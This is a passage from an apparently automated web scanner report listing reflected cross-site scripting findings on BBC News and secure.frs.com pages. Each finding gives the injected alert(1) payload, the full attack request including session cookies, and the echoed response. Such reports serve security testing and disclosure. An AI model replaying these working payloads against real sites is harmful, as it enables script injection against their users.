       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/86c2cd';66886aa86f8/MapPresenterInner.json',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.51. http://news.bbc.co.uk/weather/forecast/8/SearchResultsNode.xhtml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/SearchResultsNode.xhtml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2900'%3bc641997d21a was submitted in the REST URL parameter 3. This input was echoed as c2900';c641997d21a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8c2900'%3bc641997d21a/SearchResultsNode.xhtml HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:47:30 GMT
Keep-Alive: timeout=10, max=692
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59502


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=8',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8c2900';c641997d21a/SearchResultsNode.xhtml',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.52. http://news.bbc.co.uk/weather/forecast/8/SetPreference.xhtml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/SetPreference.xhtml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dddef'%3balert(1)//b648af5ea8d was submitted in the REST URL parameter 3. This input was echoed as dddef';alert(1)//b648af5ea8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8dddef'%3balert(1)//b648af5ea8d/SetPreference.xhtml HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:47:24 GMT
Keep-Alive: timeout=10, max=800
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59538


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=8',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8dddef';alert(1)//b648af5ea8d/SetPreference.xhtml',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.53. http://news.bbc.co.uk/weather/forecast/{weatherId}{extension} [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/{weatherId}{extension}

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a4b'%3ba82e0c463ad was submitted in the REST URL parameter 3. This input was echoed as 64a4b';a82e0c463ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/64a4b'%3ba82e0c463ad HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:28:08 GMT
Keep-Alive: timeout=10, max=624
Connection: close
Set-Cookie: BBC-UID=741d708ad68a0041fe1a35e321d145208f237b1600b011ba740b6ac592d185f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:30 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=741d708ad68a0041fe1a35e321d145208f237b1600b011ba740b6ac592d185f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:30 GMT; path=/; domain=bbc.co.uk;
X-Powered-By: PHP/5.2.5
X-Cache-Info: cached
Content-Length: 57784


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=64',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/64a4b';a82e0c463ad',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.54. https://secure.frs.com/freetrial/3offer50pct/FTDirect.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.frs.com
Path:   /freetrial/3offer50pct/FTDirect.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0815'-alert(1)-'54f90c4aa82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /freetrial/3offer50pct/FTDirect.aspx?a0815'-alert(1)-'54f90c4aa82=1 HTTP/1.1
Host: secure.frs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: AspxAutoDetectCookieSupport=1; FRSStore=UserId=18940695&SessionId=USsbEWL5M2AA9UJ442wT; ASP.NET_SessionId=tteix3bg50kknfg0wnoeksag;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 19:59:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26990


<!-- Google Website Optimizer Control Script -->
<!-- End of Google Website Optimizer Control Script -->

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<script type="text/javascript">
AnalyticsService.LogVisit('tteix3bg50kknfg0wnoeksag', '/freetrial/3offer50pct/FTDirect.aspx?a0815'-alert(1)-'54f90c4aa82=1');
</script>
...[SNIP]...

2.55. https://secure.frs.com/freetrial/3offer50pct/cart1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.frs.com
Path:   /freetrial/3offer50pct/cart1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7af7c'-alert(1)-'044d874d814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /freetrial/3offer50pct/cart1.aspx?7af7c'-alert(1)-'044d874d814=1 HTTP/1.1
Host: secure.frs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: AspxAutoDetectCookieSupport=1; FRSStore=UserId=18940695&SessionId=USsbEWL5M2AA9UJ442wT; ASP.NET_SessionId=tteix3bg50kknfg0wnoeksag;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 19:59:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><meta
...[SNIP]...
<script language="javascript" type="text/javascript">
AnalyticsService.LogVisit('tteix3bg50kknfg0wnoeksag', '/freetrial/3offer50pct/cart1.aspx?7af7c'-alert(1)-'044d874d814=1');
</script>
...[SNIP]...

2.56. https://secure.frs.com/freetrial/3offer50pct/how.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.frs.com
Path:   /freetrial/3offer50pct/how.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e52'-alert(1)-'4744a28f846 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /freetrial/3offer50pct/how.aspx?c0e52'-alert(1)-'4744a28f846=1 HTTP/1.1
Host: secure.frs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: AspxAutoDetectCookieSupport=1; FRSStore=UserId=18940695&SessionId=USsbEWL5M2AA9UJ442wT; ASP.NET_SessionId=tteix3bg50kknfg0wnoeksag;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 19:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
AnalyticsService.LogVisit('tteix3bg50kknfg0wnoeksag', '/freetrial/3offer50pct/how.aspx?c0e52'-alert(1)-'4744a28f846=1');
</script>
...[SNIP]...

2.57. https://secure.frs.com/freetrial/3offer50pct/success.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.frs.com
Path:   /freetrial/3offer50pct/success.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd7e'-alert(1)-'892f190a4f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /freetrial/3offer50pct/success.aspx?9cd7e'-alert(1)-'892f190a4f3=1 HTTP/1.1
Host: secure.frs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: AspxAutoDetectCookieSupport=1; FRSStore=UserId=18940695&SessionId=USsbEWL5M2AA9UJ442wT; ASP.NET_SessionId=tteix3bg50kknfg0wnoeksag;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 19:59:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
AnalyticsService.LogVisit('tteix3bg50kknfg0wnoeksag', '/freetrial/3offer50pct/success.aspx?9cd7e'-alert(1)-'892f190a4f3=1');
</script>
...[SNIP]...

2.58. http://www.bbc.co.uk/go/homepage/i/int/br/ent/head/t/-/entertainment/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/homepage/i/int/br/ent/head/t/-/entertainment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c61a'-alert(1)-'549ccc14704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/homepage/i/int/br/ent/head/t/-/entertainment/?4c61a'-alert(1)-'549ccc14704=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:30:16 GMT
Keep-Alive: timeout=10, max=765
Expires: Thu, 16 Dec 2010 19:30:16 GMT
Connection: close
Content-Length: 57110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527816000,
       editionToServe: 'us',
       queryString: '4c61a'-alert(1)-'549ccc14704=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10072371'
...[SNIP]...

2.59. http://www.bbc.co.uk/news/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb12'-alert(1)-'1eff79a9885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/?4bb12'-alert(1)-'1eff79a9885=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:40 GMT
Keep-Alive: timeout=10, max=749
Expires: Thu, 16 Dec 2010 19:27:40 GMT
Connection: close
Content-Length: 93370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527660000,
       editionToServe: 'us',
       queryString: '4bb12'-alert(1)-'1eff79a9885=1',
       referrer: null,
       section: 'front-page',
       sectionPath: '/Front page',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10263779',
       assetType: 'index',
...[SNIP]...

2.60. http://www.bbc.co.uk/news/business-12005593 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12005593

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4532d'-alert(1)-'2a1e16ab167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12005593?4532d'-alert(1)-'2a1e16ab167=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:00 GMT
Keep-Alive: timeout=10, max=799
Expires: Thu, 16 Dec 2010 19:28:00 GMT
Connection: close
Content-Length: 69589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527680000,
       editionToServe: 'us',
       queryString: '4532d'-alert(1)-'2a1e16ab167=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12005593',
       assetType: 'story',
       
...[SNIP]...

2.61. http://www.bbc.co.uk/news/business-12006544 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006544

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8e3'-alert(1)-'a4714e34646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006544?9d8e3'-alert(1)-'a4714e34646=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:19 GMT
Keep-Alive: timeout=10, max=729
Expires: Thu, 16 Dec 2010 19:28:19 GMT
Connection: close
Content-Length: 56396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527699000,
       editionToServe: 'us',
       queryString: '9d8e3'-alert(1)-'a4714e34646=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006544',
       assetType: 'story',
       
...[SNIP]...

2.62. http://www.bbc.co.uk/news/business-12006764 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006764

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af8e'-alert(1)-'e9869bcb09b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006764?4af8e'-alert(1)-'e9869bcb09b=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:17 GMT
Keep-Alive: timeout=10, max=750
Expires: Thu, 16 Dec 2010 19:28:17 GMT
Connection: close
Content-Length: 70174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527697000,
       editionToServe: 'us',
       queryString: '4af8e'-alert(1)-'e9869bcb09b=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006764',
       assetType: 'story',
       
...[SNIP]...

2.63. http://www.bbc.co.uk/news/business-12006835 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006835

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c96c8'-alert(1)-'338fb700f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006835?c96c8'-alert(1)-'338fb700f35=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:27 GMT
Keep-Alive: timeout=10, max=741
Expires: Thu, 16 Dec 2010 19:28:27 GMT
Connection: close
Content-Length: 61421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527707000,
       editionToServe: 'us',
       queryString: 'c96c8'-alert(1)-'338fb700f35=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006835',
       assetType: 'story',
       
...[SNIP]...

2.64. http://www.bbc.co.uk/news/business-12007016 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12007016

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5e0c'-alert(1)-'933bcd19de9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12007016?f5e0c'-alert(1)-'933bcd19de9=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:19 GMT
Keep-Alive: timeout=10, max=744
Expires: Thu, 16 Dec 2010 19:28:19 GMT
Connection: close
Content-Length: 65628

